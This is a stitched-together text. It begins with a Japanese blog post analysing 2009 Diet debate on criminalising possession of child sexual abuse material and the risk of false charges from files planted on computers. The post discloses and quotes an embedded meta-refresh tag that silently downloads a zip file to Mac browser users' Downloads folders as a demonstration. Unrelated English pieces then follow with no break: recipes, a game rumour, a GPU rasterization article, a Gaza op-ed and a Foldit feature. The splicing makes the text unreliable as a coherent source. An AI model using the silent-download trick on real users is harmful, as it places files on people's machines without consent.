先週末、はてブ界隈で児童ポルノ法改正の国会審議の話題が上がってきていたので、所謂「まとめサイト」を見たところ、参考人のアグネスチャンがずいぶん酷く言われていた。いったいどんなだったんだと、衆議院TVで録画を観たところ、そんなにひどい話ではなく、やはりネットのこの手の「まとめ」は真に受けてはいけないなと思った。それはともかく、与党案と民主党案の2つの法案が出ていて、法案提出者との質疑がなかなかディベートとして面白いものになっていた。単純所持での冤罪の懸念に関する議論では、コンピュータ技術に関わる部分があり、興味深い。
まず、提出されている法案を確認しておくと、与党提出法案では、(1)目的によらず、「何人も、みだりに、児童ポルノを所持し、又は（略）記録した電磁的記録を保管してはならない」と、罰則なしで禁止したうえで、(2) 「自己の性的好奇心を満たす目的で」と、目的で限定されたケースについて「1年以下の懲役又は100万円以下の罰金」の罰則を設けた構成になっている。一方の民主党提出法案では、「みだりに、（略）有償で又は反復して取得した者」「みだりに、電気通信回線を通じて（略）記録した電磁的記録その他の記録を有償で又は反復して取得した者」を「3年以下の懲役又は300万円以下の罰金に処する」としている。民主党案では取得のプロセスの立証が必要となる点が違いの一つらしい（以下の質疑内容からすると）。
質疑でまず興味深かったのは、次の部分。
●自由民主党 牧原秀樹議員 （略）いろんなご意見をうかがってますと、所持という客観的事実に加えて、自己の性的好奇心を満たす目的というのが、主観的要件で、あります。これ、具体的に言いますとたとえば、鞄の中にいつの間にか、大量に児童ポルノが入れられていて、そして通報がされて、警察が「ちょっと鞄開けてみてくれ」って調べてみたら、児童ポルノが出てきたと。これ、所持という要件を満たしますから、その上で、自己の性的好奇心を満たす目的だったのかどうか、取り調べてみないとわからないということで、警察としては、一回そこで捜査に着手せざるを得ないんじゃないかというような懸念は確かにあります。このような捜査の恣意性、これを指摘されていることについて、与党案ではどのようにお考えになっているでしょうか。 ●与党案提出者 葉梨康弘議員 （略）所持ということであれば、それは、持っているという事実については、これは所持ですから、もう明らかなんです。現行犯的なものでやっていかざるを得ないでしょうし、物がなければ所持ということになりません。そして、ひとつはその所持の故意性です。ですから、単に、先ほどの例でですね、もしかしたらこんなメールが送りつけられて来るかもわかりませんよというようなものが来たとしても、私は、全体としてパソコンを開いているというだけで未必の故意が成立するとは思えないです。やはり、このメールというのはもしかしたら児童ポルノかもわからないというような、そういうような認識というのがやはり必要になってくるだろうと思う。さらには、それがたまたま人に入れられたものかどうか、そういうような抗弁があれば、それはよく確認をしなければならないし、そういうのを十分に信じるに足るような弁解があったときに、警察において、捜査機関においてそれで逮捕ということになるかといったら、私はならないというふうに思います。また、自己の性的好奇心を満たす目的でというのを、自白に頼らざるを得ないというふうに言われますけども、たとえば殺人の行為というのは、「私は殺すつもりはなかったんです」と言ったってですね、拳銃を持って相手をボーンと撃ったらですね、どんな自白が否認をしていたって殺人の故意というのはやはり客観的に認められるわけです。ですから、自分の性的好奇心を満たす目的というのは、たとえその自白がなかったにしたって、その家に大量の児童ポルノを持ってると、その横っちょに大人のポルノもたくさん持ってるというような家でですね、児童ポルノを持っている方が、「私は自分の性的好奇心を満たす目的じゃございません」と言ったところで、それはたぶん裁判所では通らない話になってくるだろう。ですから、自白だけに頼るということじゃなくて、やはり客観的な証拠に基づいて捜査というのはできるんだろうというふうに、私は確信しています。
（ニコニコ動画での視聴 22分05秒経過あたりから）
この議論は、抽象的な法律論としては基礎的な考え方として理解できるのだが、実際には、有体物の所持と電磁的記録の保管とでは現実の性質が違うわけで、この答弁で例示されている従来からの法律論での考え方は、有体物を前提としてしまっている点が不十分である。
つまり、たしかに、家の本棚に大量に有体物が並んでいるといった状況は、不可抗力でそうなったというのは考えにくいわけだけども、しかし、パソコンの中の何百ギガバイトのデータの中に、該当する電磁的記録が（少量に、あるいはもしかすると大量に）混じっているということは、それなりに普通に起こり得る事態であるわけで、与党案提出者の答弁は、有体物については答えになっていても、電磁的記録について答えになっていない。
この点について、民主党からの質問（「民主党案でも良いじゃないか」とする趣旨の質問）に際して、与党案提出者は、それを否定しながら、次のようにより踏み込んで説明している。
●民主党 枝野幸男議員 （略）結局、単純所持罪を作っても、故意とか、性的好奇心を満たす目的ということを立証しようと思えば、その取得のプロセスをそれなりに立証せざるを得ないということになるのではないか。（略）自己の性的好奇心を満たす目的というのを立証しようと思ったら、なるほど本人がこれを積極的に手に入れようとしていた、あるいは、繰り返し手に入れていた、お金を払っていた、こういったことが立証されて初めて、所持罪の故意が認められる、あるいはそういったことが立証されて初めて、性的好奇心を満たす目的が立証されるということであるならば、じつは両案はあまり変りはない。（略）だけど、そのことはどこにも担保されてないんですよ。自白さえあって、自分の占有下に当該物があったときに、裁判官は無罪にしますか？（略）逆に言えば、そういうときに必ず入手したプロセスを証拠として挙げろということであるならば、我々の案と変わらないじゃないですか。だとすれば、冤罪を防ぐ見地から考えれば、取得のプロセスについて、ちゃんと立証するそのこと自体が構成要件であるという制度にした方が、安全じゃないですか？ ●与党案提出者 葉梨康弘議員 （略）必ず取得の過程というのを立証しなければならないというのは、これはちょっと違うんじゃないですか。たとえばですよ、パソコンの外付けのHD、ハードディスクに、ある画像がありました。それを自分がダウンロードした。どっから取得したかわかりませんね。外付けのHDの中にある画像、どこから取得したものか立証しないでも、自分のHDに、ハードディスクに自らダウンロードして、それを何回も何回も開いて観ている。自分が。ということであればですね、これは、そうとうこれは自己の性的好奇心を満たす目的というのが、立証の大きな材料になるんじゃないですか。そこにおいては、どこのサイトから取りましたということまで、構成要件上必要はないというふうに思いますよ。ですから、必ず取得の過程というのを立証しなければならないということではないわけです。それと、さきほどからですね、パソコン、インターネットの世界のことをずっと言われてますけども、どこから入手したということはまったく問題ないけども、実際有体物だったらどうでしょう。有体物として児童ポルノを持っている。それはどこで買いましたということを立証しなければ、自己の性的好奇心を満たす目的というのを立証できないんですか？
そんなことはありませんでしょう。自宅の中にたくさんの児童ポルノのビデオを持っててですよ、それをどこから買ったなんて関係ないですよ。そんなこと立証できなくったって、それを何回も何回も観てニヤニヤ笑ってりゃ、それは自己の性的好奇心を満たす目的で所持してるってことになるでしょ。必ず取得の過程を捜査で立証しなければならないというのは、それはちょっと違うと思います。
（ニコニコ動画での視聴 6分00秒経過あたりから）
このやりとりは要するに、民主党案では、取得のプロセスまで立証が必要となるようにすることで、冤罪を防ごうとしている（おそらく電磁的記録の場合を中心に）のに対して、与党案提出者は、取得のプロセスまでの立証は必要ないということを（有体物の場合を例に）述べている。
ここでも、有体物の場合と電磁的記録の場合とで性質が異なるのに、与党案提出者は、（概ね）有体物前提で答えてしまっている（特に後半）。たしかに、有体物の場合であれば、取得の過程を立証せずとも、「自己の性的好奇心を満たす目的」を立証できる場合が多いように思える。しかし、電磁的記録の場合はどうなのか。
この点について、上の答弁では、「それを何回も何回も開いて観ている。自分が。ということであれば」と、軽く触れている。これは、続くやりとりでも繰り返し説明されていた。
●民主党 枝野幸男議員 （略）主観的な目的も、たしかに、この人は幼児性愛があって、性的好奇心を満たす目的であるということがはっきりしている人を、他の客観的事情で立証する、これはたしかにできます。おっしゃる通りです。本人の自白がなかったとしても、自白に頼らなくても、なるほどこの人はこれこれこういう趣味で、こういったことを今までやってきている、あるいは周辺の人の証言でってことは、可能かもしれません。でも逆に、そういう幼児性愛などの性向がなくて、ご本人に性的好奇心がなかったとしても、現に持っている人が、「 いや俺は幼児性向ではない 」
「私は性的好奇心を満たす目的ではない」ということを、どうやって抗弁できるんですか。結局は、性的好奇心を満たす目的であるという自白が取られてしまったら、それ以外にそれを否定する客観証拠を出して否定することできないじゃないですか。まさに内心の問題ですから。でもそれも処罰の対象になるんだというこの法律の問題点を我々は指摘をしているんですよ。いやそれはしかたがないと、そういう人がたまたま1枚持っていた（略）そして捜査官の方が大変熱心な捜査官で、「お前、こんな物持ってたんだから、性的好奇心を満たす目的だろう」そういうことで足利事件のように辻褄の合う証言が得られてしまいましたと。こういう人は冤罪でも処罰されてもしかたがないというんだったら、与党案は正しい法案だと思います。でも、そういったことは絶対起こしてはいけない。絶対起こしてはいけないなかで、なおかつきちっと、処罰をしなければならない人達については処罰をする。それが私たちには求められているんで、少なくとも現状の与党案は、その部分のところで決定的な問題があると思いませんか？ ●与党案提出者 葉梨康弘議員 冤罪は絶対にあってはなりません。これは絶対なくしていくようにお互いちゃんと努力をしていきましょう。しかし、今のお話を聞いてみると、ちょっと本末転倒じゃないかなというようなところもあります。一つの児童ポルノを持っている。これについて冤罪があるというんであれば、それはなくす努力をしっかりするべきであります。しかしながら、だからといってですよ、そういうことがあるんだ、もしかしたら皆、陥れられてしまうかもわからないんだというような、私はそんなことはないと思います。ないと思いますけれども、そういう考え方で、たくさんの児童ポルノを蔵書としてかかえている、それは許される、そっちに行ってしまうというのは、考え方として違うんじゃないか。なんで民主党案は、そういうことをもし言われるんだったら、大量の児童ポルノを所持している場合を禁止をしなかったんだ、というふうに私は思いますよ。（略）それと、もうひとつもうしあげますと、具体的に自白だけでって言ったって、さっきの例で言えば、昔ですね、たしかに週刊誌の中には児童ポルノってのはあったかもわかりません。それは私もよく知っています。でも、家を見たら、それが何十年前の他の雑誌と一緒に束になってですね、それで全然見た形跡もないし、埃をかぶってるといって、それでね、自白をね、「こいつ、性的好奇心を満たす目的だ」って自白を強要する捜査官なんて、私はいないと信じてますよ。で、そうじゃなくて、やっぱり児童ポルノであれば、有体物であれば、それを何回見たとかいう態様ですとかね、それから、パソコンの情報であれば、それをダウンロードしてるとか、何回開いたとか、そういったことから、やはりこれは自分が観てるんだな、性的好奇心を満たす目的で観てるんだな、それで所持してるんだなということは自ずと明らかにするような、しっかりした捜査が行われることが、私は求められていると思うし、もしも、捜査に対する配慮っていうのを我々が、しっかりしなきゃいけないことをさらに求めるんだったら、この国会でちゃんと捜査機関に対してしっかり求めていきましょうよ。
（ニコニコ動画での視聴 23分24秒経過あたりから）
有体物なら、どのくらい鑑賞しているか判断できるというのは理解できるのだが、与党案提出者は、どうやら、有体物についてそうするのと同様に、電磁的記録についても判断できるという前提を置いているようだ。
しかし、コンピュータ技術者ならわかるように、普通のOSにおいて、ファイルを「何回開いた」という記録は残らないものなのだが？
この与党案提出者は、続く別の質問者に対しても、次のように答えていた。
●与党案提出者 葉梨康弘議員 （略）午前中から議論さして頂いておりますけども、自己の性的好奇心を満たす目的というのが、自白だけによっかかって立証するんだというのは、それはそうじゃないだろうと思います。やはり、たとえば1枚でもあっても、1枚であって自己の性的好奇心を満たす目的でありますよという立証をするときには、絶対自白だけじゃないでしょうかって言ったら、その児童ポルノに手垢がついてて何回も観られてるとかですね、何回もクリックされてるとか、先ほども答弁ありましたけども、児童ポルノの内容ですとか、そういったことからある程度、私は客観的に立証ができると思っています。
（ニコニコ動画での視聴 30分10秒経過あたりから）
手垢で判断できるというのは理解できるが、「何回もクリックされてる」というのは、いったいどうやって調べるというのだろう？
コンピュータ上のファイルの場合、ファイルごとに最終読み出し時刻が記録されるOSはあるが、読み出した回数を記録するOSというのは、普通の人が使っている市販のOSにあっただろうか？ 最終読み出し時刻は、OSによっては、別のハードディスクに移動させるなどの目的でコピーした場合にも更新されるし、ウイルス対策ソフトによるスキャンでも更新されるだろうから、最終読み出し時刻からでは、繰り返し観ているらしいことは判別できないのではないだろうか。
何百ギガバイトものハードディスクの中に1個の.zipファイルがあって、その中に大量の児童ポルノ画像が含まれているというのが見つけ出されたときに、どうやって、目的要件を立証するのだろう？
そうすると気になるのは、冒頭で引用した部分の答弁に、次の発言があった点だ。
自分の性的好奇心を満たす目的というのは、たとえその自白がなかったにしたって、その家に大量の児童ポルノを持ってると、その横っちょに大人のポルノもたくさん持ってるというような家でですね、児童ポルノを持っている方が、「私は自分の性的好奇心を満たす目的じゃございません」と言ったところで、それはたぶん裁判所では通らない話になってくるだろう。
これからすると、大人のポルノを所持・保管しているかも加味されるということになるのだろうか。
「 その横っちょに」というけれども、本棚の有体物なら話はわかるが、コンピュータのファイルシステム内で、「横っちょ」という概念が意味を為すのかどうか。全然別のフォルダにあっても、場所を知っている者はすぐに開くことはできるわけだから、別のフォルダにあるからという理由で潔白を主張できるのだろうか？
昨年の5月に「単純所持刑罰化ならウイルス罪を同時施行しないとセキュリティバランスが悪化する」という日記を書いた。このとき、何が問題なのかを説明するために、次のように書いた。
日経新聞の記事によれば、今般の児童ポルノ法改正案では、単純所持に「性的好奇心を満たす目的で」という限定を付けることが検討されているらしい。
このような目的限定が付けば、暴露ウイルスは、「性的好奇心を満たす目的」を証明するような情報も同時に流出するような仕掛けを導入してくるだろう。
Winnyの暴露ウイルスが、しだいにエスカレートして、送受信メールやWinnyの検索履歴も同時に流すようにしたのと同様にである。「性的好奇心を満たす目的」を証明する情報としては、大人のポルノ画像の所持状況や、Webの検索履歴やアクセス履歴（これらはWebブラウザ等に記録されている）などがターゲットにされるだろう。個人を特定するためには、送受信メールがターゲットにされる。
そうなると、児童ポルノ愛好家でなくても、たとえば、児童ポルノ画像が1枚紛れ込んだ多数の大人のノーマルなポルノ画像のようなファイルないしフォルダを流出させられて、「性的好奇心を満たす目的」が認定されて児童ポルノ法違反で検挙という事件が起きるであろうし、（以下略）
単純所持刑罰化ならウイルス罪を同時施行しないとセキュリティバランスが悪化する , 2008年5月5日の日記
じつは、正直、これを書いたとき、「大人のポルノ画像を持っていることが理由で、別の児童ポルノ画像についての性的好奇心を満たす目的が認定される」とした理屈は、自分で書いていても、やや無理があるかなと思っていた。それなのに、先週の国会審議で、「その横っちょに大人のポルノもたくさん持ってるというような」という発言が飛び出してきて、驚いた。まさか本当にそんな考え方がなされるのだとは。
大人のポルノを 「 自己の性的好奇心を満たす目的で」大量に保管している人が、意図せず、偶然に、あるいは、他者からの攻撃によって、児童ポルノが大量に含まれた.zipファイル1個をハードディスク内に持ってしまったときに、身の潔白を証明することは、はたしてできるのだろうか。
ところで、今、この日記を 、Mac OS 上の Safari（また はGoogle Chrome）で読んでいる人は、 「 ダウンロード」フォルダに、pictures.zip
がさきほど入ったはずだ。それは、この日記ページ内に、以下のHTML断片を記述していることによるものである。
< meta HTTP-EQUIV= " Refresh " CONTENT="5;URL=http://takagi-hiromitsu.jp/diary/fig/20090629/pictures.zip " >
つまり、いつのまにかファイルをダウンロードして保存してしまうことは、実際に起きるということなのだが、このMac OS 版 Safari（およ びGoogle Chrome）の挙動は、セキュリティホールではなく、仕様である。これは、2008年5月に、Windows版
Safariで問題とされたが、Windows版では問題となるので修正されたが、Mac OS版では、問題とは考えられておらず、仕様である。
しかも 、Mac OS 10.5 を使っている人なら 、「 Time Machine」を使っている人も少なくないだろう。そういう人は、「ダウンロード」フォルダに入った pictures.zip はもう既に 、Time Machineバックアップ用のハードディスクにコピーされているかもしれない。なにしろ、1時間毎に1日24回、自動バックアップが開始されるのだから。今から「ダウンロード」フォルダの pictures.zip を削除しても 、Time Machineバックアップの中のファイルは残り、後からいつでも取り出せる（画像などはそのまま開ける）状態が続く。
この、ホワイトホールへと奥深く連なるフォルダ群のどこかに、何か月も前に勝手に「ダウンロード」フォルダに入っていた .zipファイル（要らないファイルを捨てるまでの間に一時的に存在していた）が、バックアップとして今も保存されているのかもしれない。そこに児童ポルノ入りの .zip があったときに、それを捜査機関が何らかのきっかけで見つけた場合に、与党案提出者が言う「何十年前の他の雑誌と一緒に束になって、埃をかぶってる」状況と、同様に扱ってくれるのかどうか。
そんなわけで 、Mac OS 10.5 ユーザは 、Time Machine の設定で、 「 バックアップから除外する項目」に、「ダウンロード」フォルダを含める設定をするのが賢明と思う。
なお、私は民主党案に賛成するわけでもない。与党案提出者が「なんで民主党案は（略）大量の児童ポルノを（既に取得して蔵書として）所持している場合を禁止をしなかったんだ」と指摘するように、法改正の目的からすれば、民主党案では目的が達成されないだろうと思う。じゃあどうすればよいのか、というのは私にはわからない。少なくとも、電磁的記録における冤罪の危険の指摘に対して、有体物の場合を例に説明するのはやめてほしいと思う。
なお、 「単純所持刑罰化ならウイルス罪を同時施行しないとセキュリティバランスが悪化する」で書いた懸念は今もあると思うが、ウイルス罪新設刑法改正案の審議は今国会でも全く行われていないようだ。
While you can find zucchini in supermarkets 365 days a year , the emerald green veggie is known as summer squash for a reason .
That 's because the warm weather season is zucchini's time to shine .
And as avid gardeners will tell you , it often produces a bumper crop .
Luckily , there 's more to zucchini than bread or grilled halves .
So if you 're looking to make the most of what the squash has to offer , check out our easy zucchini recipes , from lightened - up lasagnas and summery soups to spectacular side dishes stuffed boats .
A recent job listing may suggest that Team Bondi’s L.A. Noire may still be exclusive to the PlayStation 3 .
The listing does not showcase any developer names , but has some similarites to the job listing here .
This particular listing states that the company is working on three exclusive titles for the next generation PlayStation platform .
Mind you , this could either mean PS3 or PSP .
Now , Team Bondi posted a similar listing , which asked for the same job , a 3D car modeler .
The listings were also posted nearly the same date , around May 27 - 29 2009 .
As of right now , the only title Team Bondi is working on is L.A. Noire .
Perhaps L.A. Noire is still exclusive to PS3 , despite occasional rumors denying so .
It ’s also important to note that Team Bondi was founded by Brendan McNamara , who worked at Sony Computer Entertainment ’s Team Soho Studio in London as Director of Development .
He worked on The Getaway as well , having written and directed the game .
[ Source ]
You do n't tug on Superman 's cape
You do n't spit into the wind
You do n't pull the mask off that old Lone Ranger
And you do n't mess around with Jim
The first time you heard the chorus of " You Don't Mess Around with Jim , " you no doubt immediately wondered why Jim Croce left out " And you do n't rasterize in software if you 're trying to do GPU - class graphics , even on a high - performance part such as Larrabee . "
That 's just common sense , right ?
It was obvious to me , anyway , that Larrabee was going to need a hardware rasterizer .
But maybe Jim knew something I did n't , because it turned out I was wrong , and therein lies a tale .
First , though , let 's back up a step and get some context .
Parallel programming for semi- parallel tasks
In A First Look at the Larrabee New Instructions ( LRBni ) , I presented an overview of Larrabee , an upcoming multithreaded , vectorized , manycore processor from Intel .
It may not be entirely apparent from that article , but the LRBni contains everything you need to do a great job running code that 's designed to be vectorized , such as HLSL shaders .
But what about tasks that are n't inherently scalar ( in particular , where the iterations are n't serially dependent ) , and that at the same time can't be efficiently parallelized in any obvious way , and for which the usual algorithms are n't easily vectorized ?
In the process of implementing the standard graphics pipeline for Larrabee , we ( the Larrabee team at RAD -- Atman Binstock , Tom Forsyth , Mike Sartain , and me ) have gotten considerable insight into that question , because while the pipeline is largely vectorizable , there are a few areas in which the conventional approaches are scalar , and where some degree of serialization is unavoidable .
This article takes a close look at how we applied the Larrabee New Instructions to one of those problem areas -- rasterization -- in the process , redesigning our implementation so it was far more vectorizable so it took advantage of the strengths of Larrabee 's CPU - based architecture .
Needless to say , performance with the Larrabee New Instructions will vary greatly from one application to the next -- there 's not much to be done with purely scalar code -- but diving into Larrabee rasterization in detail gives you a good sense of what it 's like to apply the Larrabee New Instructions to at least one sort of non-obvious application .
To avoid potential confusion , let me define " rasterization " :
For our present purposes , it 's the process of determining which pixels are inside a triangle , and nothing more .
In this article , I wo n't discuss other aspects of the rendering pipeline , such as depth , stencil , shading , or blending , in any detail .
Rasterization Was the Problem Child -- But Less Problematic Than We Thought
When we look at applying the Larrabee New Instructions to the graphics pipeline , for the most part , it 's easy to find 16 - wide work for the vector unit to do .
Depth , stencil , pixel shading , and blending all fall out of processing 4×4 blocks , with writemasking at the edges of triangles .
Vertex shading is not quite a perfect fit , but 16 vertices can be shaded and cached in parallel , which works well because vertex usage tends to be localized .
Setting up 16 triangles at a time also works pretty well ; there 's some efficiency loss due to culling , but it still yields more than half of maximum parallelism .
That leaves rasterization , which is definitely not easy to vectorize with enough performance to be competitive with hardware .
As an aside , the Larrabee rasterizer is not , of course , the only rasterizer that could be written for Larrabee .
There are other rasterizers for points and lines , and of course , there may be other future rasterizers for interesting new primitive types .
In fact , I suggest you write your own -- it's an interesting problem !
But as it does n't have a more formal name , I 'll just refer to the current general - purpose triangle rasterizer as " the Larrabee rasterizer " in this article .
The Larrabee rasterizer was at least the fifth major rasterizer I 've written , but while the others were loosely related , the Larrabee rasterizer belongs to a whole different branch of the family -- so different , in fact , that it almost did n't get written .
Why ?
Because , as is so often the case , I wanted to stick with the mental model I already understood and was comfortable with , rather than reexamining my assumptions .
Long - time readers will recall my fondness for the phrase " Assume nothing " ; unfortunately , I assumed quite a lot in this case , proving once again that it 's easier to dispense wise philosophy than to put it into action !
Coming up with better solutions is all about trying out different mental models to see what you might be missing , a point perfectly illustrated by my efforts about 10 years ago to speed up a texture mapper .
I had thrown a lot of tricks at it and had made it a lot faster , and figured I was done .
But just to make sure , I ran it by my friend David Stafford , an excellent optimizer .
David said he'd think about it and would let me know if he came up with anything .
When I got home that evening , there was a message on the answering machine from David , saying that he had gotten two cycles out of the inner loop .
( It 's been a long time , and my memories have faded , so it may not have been exactly two cycles , but you get the idea . )
I called him back , but he was n't home ( this was before cellphones were widespread ) .
So all that evening I tried to figure out how David could have gotten those two cycles .
As I ate dinner , I wondered ; as I brushed my teeth , I wondered ; and as I lay there in bed not sleeping , I wondered .
Finally , I had an idea -- but it only saved one cycle , not two .
And no matter how much longer I racked my brain , I could n't get that second cycle .
The next morning , I called David , admitted that I could n't match his solution , and asked what it was .
To which he replied : " Oh , sorry , it turned out my code does n't work . "
It 's certainly a funny story , but more to the point , the only thing keeping my code from getting faster had been my conviction that there were no better solutions -- that my current mental model was correct and complete .
After all , the only thing that changed between the original solution and the better one was that I acquired the belief that there was a better solution -- that is , that there was a better model than my current one .
As soon as I had to throw away my original model , I had a breakthrough .
Software rasterization is a lot like that .
The previous experience that Tom Forsyth and I had with software rasterization was that it was much , much slower than hardware .
Furthermore , there was no way we could think of to add new instructions to speed up the familiar software rasterization approaches , and no obvious way to vectorize the process , so we concluded that a hardware rasterizer would be required .
However , this turned out to a fine example of the importance of reexamining assumptions .
In the early days of the project , as the vector width and the core architecture were constantly changing , one of the hardware architects , Eric Sprangle , kept asking us whether it might be possible to rasterize efficiently in software using vector processing .
We kept patiently explaining that it was n't .
Then , one day , he said : " So now that we 're using the P54C core , do you think software rasterization might work ? "
To be honest , we thought this was a pretty dumb question because the core did n't have any significant impact on vector performance ; in fact , we were finally irritated enough to sit down to prove in detail -- with code -- that it would n't work .
And we immediately failed .
As soon as we had to think hard about how the inner loop could be structured with vector instructions , and wrote down the numbers -- that is , as soon as our mental model was forced to deal with reality -- it became clear that software rasterization was in fact within the performance ballpark .
After that , it was just engineering , much of which we 'll see shortly .
First , though , it 's worth pointing out that , in general , dedicated hardware will be able to perform any specific task more efficiently than software ; this is true by definition because dedicated hardware requires no multifunction capability , so in the limit , it can be like a general - purpose core with the extraneous parts removed .
However , by the same token , hardware lacks the flexibility of CPUs , and that flexibility can allow CPUs to close some or all of the performance gap .
Hardware needs worst - case capacity for each component , so it often sits at least partly idle ; CPUs , on the other hand , can just switch to doing something different , so ALUs are never idle .
CPUs can also implement flexible , adaptive approaches , and that can make a big difference , as we 'll see shortly .
It is such a sad thing that people no longer listen to old vinyl records , but still you can use them to make something funny , like turning them into creative works of art .
The results can be very impressive .
Israeli naval ships often attack Palestinian fishing boats off the coast of the Gaza Strip .
( David Schermerhorn )
US
On the morning of 29 June , the Spirit of Humanity set sail from Cyprus to the Gaza Strip carrying approximately three tons of medical aid , olive saplings , children ’s toys and other humanitarian items for the area ’s 1.5 million residents .
The Spirit traveled through international waters when , at approximately 1:30 am , several Israeli gunships surrounded the boat , jammed its GPS , navigation and radar systems and threatened to open fire .
Heavily - armed Israeli naval commandos boarded the boat , ordered the Spirit ’s passengers to lie face down , roughed up several , and ultimately forced the humanitarian volunteers to Israel where they were held for days in hot , crowded , cells before all but two ( both Israeli citizens ) were ultimately deported .
The Israeli navy routinely harasses Palestinian fishing boats off the coast of Gaza , and has on occasion seized boats and Â detained their crews , just as it did with the Spirit of Humanity .
An act of piracy , as defined by the law of nations , includes illegal acts of violence or detention committed on the high seas or outside the jurisdiction of any state .
While today piracy often conjures up ideas of buried treasure , sunken ships and Johnny Depp at his best ; olden - day pirates instilled a sense of terror in seafarers traveling in no -man ’s zones , outside the protection of any state .
Israel ’s commandeering of the Spirit last week shares a lot in common with these traditional acts of piracy : the Spirit ’s unarmed passengers traveled on the high seas , vulnerable , uncertain if they would live or die when the Israeli navy surrounded them and took them prisoners .
But do Israel ’s actions constitute piracy ?
The answer is : Yes .
Israel committed clear acts of violence and detention against the Spirit ’s passengers , acts , which , under the UN Convention on the High Seas , are unlawful .
A warship may legitimately board a foreign ship on the high seas in only three circumstances : there is reason to believe the boat was engaged in piracy , the slave trade or the boat — despite its flag — is really of the same nationality as the warship .
None of these circumstances apply here .
According to a 1 July press release from the Free Gaza Movement , the Spirit of Humanity was in international waters when the Israeli navy captured it .
However , even if the boat was in Gazan waters , the above acts still constitute piracy because Gazan waters are outside the jurisdiction of any state — and certainly outside Israel ’s jurisdiction .
Jurisdiction , it should be noted , is different from control .
While Israel exercises de facto control over Gaza , it has no legal de jure jurisdiction over Gaza .
Furthermore , while piracy has traditionally been defined as a private act , there is no reason why Israel ’s seizure of the Spirit , its passengers and its humanitarian cargo should not be considered an act of state or state - sponsored piracy .
Israel committed an act of piracy by hijacking the Spirit , forcing its passengers to Israel , imprisoning them and taking their cargo and personal items .
But why is it important that Israel be charged with piracy , especially when it already faces a host of new war crimes accusations ?
The law of nations has long upheld the principle that pirates are “ hostis humani generis ” — an “ enemy of all mankind . ”
In the 18th century , nations reached a consensus that piracy was universally wrong and every nation has a right to prosecute pirates of any nationality .
In United States v. Smith , 18 U.S. 153 ( 1820 ) , the US Supreme Court held that the principle of universal jurisdiction applies to punishing all persons , whether “ natives or foreigners , who have committed [ piracy ] against any persons whatsoever …. ”
In other words , piracy was one of the first criminal acts recognized by international law .
Today , international law confers on piracy , along with slavery and genocide , the status of a jus cogens — a norm or a right that can never be derogated .
This means a state is bound by a jus cogens norm whether or not it consents to its application .
As an example , a country may not engage in slavery simply because it has enacted laws making it permissible to do so .
Filing indictments against Israeli government officials and senior army commanders for crimes related to piracy is important not only because the perpetrators of the 30 June hijacking must be brought to justice , but also to reinforce the legitimacy of international law , which is increasingly viewed as being selectively used by rich countries as a tool to oppress poorer ones .
The War on Piracy has been highlighted most recently by UN Security Resolution 1851 , initiated by the US , which calls on all states to actively take part in the fight against piracy off the coast of Somalia , and even authorizes states to take measures inside Somalia .
The laws of piracy should not be selectively applied to poor Africans who hijack huge tankers belonging to rich corporations .
Just as US prosecutors in the Southern District of New York indicted a Somali national on ten counts including piracy and hijacking , similar charges should be brought against the Israelis who committed , aided and abetted in the 30 June act of piracy and any others against Palestinian vessels .
But more importantly , governments and international civil society must do all they can to pull Israel back into the bounds of international law and truly support the self - determination and human rights of all peoples , including Palestinians .
Radhika Sainath is a Los Angeles - based civil rights attorney .
She recently returned from a National Lawyers Guild fact - finding mission to the Gaza Strip and is an editor and author of Peace Under Fire : Israel / Palestine and the International Solidarity Movement .
Related Links
A model of a protein from Streptomyces avermitilis , a source of antibiotics .
* Origami / photo : Robert J. Lang / Talia Chetrit *
As soon as Zoran Popović saw the hair , he knew he was looking at David Baker .
It was unmistakable : Baker 's face is surrounded by an umbra of curls that organize themselves into unpredictable spirals — not unlike the complex protein molecules he studies .
They had n't met before ; Popović is an expert in graphics , a computer scientist at the University of Washington in Seattle , and Baker is a biochemistry professor with a laboratory a few blocks away .
But David Salesin , another computer scientist and a friend of Baker 's , had arranged for the three of them to meet for lunch in a restaurant near campus , because Baker needed help with a tricky problem — and it was exactly the kind of problem Popović was good at solving .
Baker was the Most Valuable Player in the protein chemistry world 's biennial World Series , a competition to see who can predict the shape a protein will fold into , knowing nothing more than the sequence of its constituent parts .
It 's called the Community - Wide Experiment on the Critical Assessment of Techniques for Protein Structure Prediction , or CASP .
With the help of a formidable weapon called Rosetta@home , Baker 's team had dominated CASP since 1998 .
Like SETI @home , the screensaver that taps spare home computer cycles to sort through radio signals from space , Rosetta farms out computation to volunteered PCs .
The 86,000 computers around the world that run it would give Baker the rough equivalent of a 77 - teraflop supercomputer for the November 2006 iteration of CASP a few weeks later .
But Rosetta@home was getting stumped by puzzles that Baker thought humans , with their superior spatial reasoning , would solve easily .
Baker suggested that users should have some way to tell the screensaver to try a different approach .
Popović shook his head .
" No one 's going to care about that , " he said .
" If you really want people to get engaged , you should put people at the center . "
Salesin thought so , too — in fact , he thought protein folding would make a terrific computer game .
That 's why he'd set up this lunch .
Baker , thinking about the intense focus he'd seen on the face of his preteen son when playing videogames , agreed .
The game they came up with , Foldit , does n't have orcs or quests or gravity hammers .
It simply serves up a multicolored knot of spirals and clumps — a 3 - D render of a protein .
Players use the cursor to grab , bend , pull , and wiggle the chain of amino acids anywhere along its length , folding the protein into its optimum shape .
The only rules are based on physics — opposite charges attract , atomic bonds have limited angles of rotation , and the parts of the molecule that stick to water tend to point outward .
The closer your model 's properties adhere to those rules , the more points you get .
More than 100,000 people have downloaded Foldit since last summer , turning the game into massively multiplayer competition — global online molecular speed origami .
And when they came up with potentially accurate CASP protein structures , Baker entered those into the competition .
Whoever cracks the hidden secrets of protein folding will push us that much closer to new antibiotics , cancer treatments , and biofuels .
Instead of relying solely on computer cycles to accelerate his research , Baker has harnessed neurons and the human urge to play .
And if his army of gamers yields a few savants ?
So much the better , Baker says .
" We 're looking for prodigies . "
Hydrogen , the most common molecule in the universe , is just two atoms — each with one proton and one electron .
Proteins , the chemical structures that underpin everything from muscles to mothers ' milk , are at the other end of the complexity scale : Built on long , kinky backbones of molecules called amino acids , proteins can comprise more than 10,000 atoms apiece .
The key to how any protein works is its three - dimensional shape , determined by all the ways its atoms interact .
Trying to push two atoms closer when they want to repel is like holding magnets together when they 're oriented the wrong way .
You can force them , but nature prefers configurations that follow the path of least resistance .
In a simple molecule , that path is pretty clear : Water — H 2 O — is hydrogen - oxygen - hydrogen balanced perfectly in a V - shape at a 104.4 - degree angle .
This push and pull is inevitable .
Physics is destiny .
The Challenge
The online game Foldit is designed to reveal the shortcuts nature uses to weave a tangle of amino acids , like the one shown here , into a protein .
